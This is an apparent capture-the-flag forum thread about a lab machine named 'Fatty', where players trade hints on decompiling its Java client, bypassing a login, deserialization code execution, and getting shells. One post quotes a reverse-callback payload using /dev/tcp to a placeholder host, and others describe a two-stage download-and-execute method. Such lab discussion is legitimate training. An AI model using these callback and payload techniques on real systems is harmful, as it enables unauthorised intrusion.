Fatty

I also used recaf

Can I PM someone for the root part?

Stuck on the user part - I’ve managed to get server bins, know I need to find a route to get admin to be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?

I was in the same boat as you before figuring out how to get around that (and later seeing other people’s logins and realising I didn’t even need to get around that lol).

Where does the hashing happen?

I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. Not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.

No redirections, one argument only. I recommend doing it in two stages.

I have pingback working, but I can’t get a shell. I’ve tried the two-stage method, pulling a script into tmp for first stage, then executing it for second, but I can’t find a second stage that works. Perl etc.

If you have only one argument you can pass, how can you put it in /tmp? :wink:
Don’t worry about where you put it, just download it and try running it from that directory.

You can definitely have more than one argument - I’ve just got user. Problem is redirection chars etc.

@ue4dai said:

@CyberGeek01 said:

jd-gui seems to work fine.

I really thank you for this suggestion. It works very well.

Sure thing! Happy to pass the hint along.

Can somebody PM for the admin trick? I have a very specific question. I do not know why this technique is not working. :confused:

For gaining user level reverse shell was there much editing of source code to allow the exploitation of the OWASP method? I am struggling to get a callback and am worried I botched the code.

Same happening to me. Have tried sending many payload variations from a common tool but have not gotten anything back. Wondering if I need to go deeper and create my own custom one that can be properly cast.

Hello! Is there a need to write a custom shell? Idk, but at the moment I am stuck with the debugging and fixing of fy-ct.jr
Can you give me a suggestion? Thanks!

Hi, I’m struggling with the initial foothold. I’m using recaf but not really seeing where I should work. Could anyone give me a nudge?

Eager to discuss the user payload with someone. Can’t figure out why I get nothing back.

Edit: always (usually?) update your tools. Now onto root.

Got root! It was fascinating. Nice and fun box! Thanks @qtc and thanks for support @alesc.

Never mind, I got it.

Is there a need to get the source code of the server? I decompiled the client and only looked at it.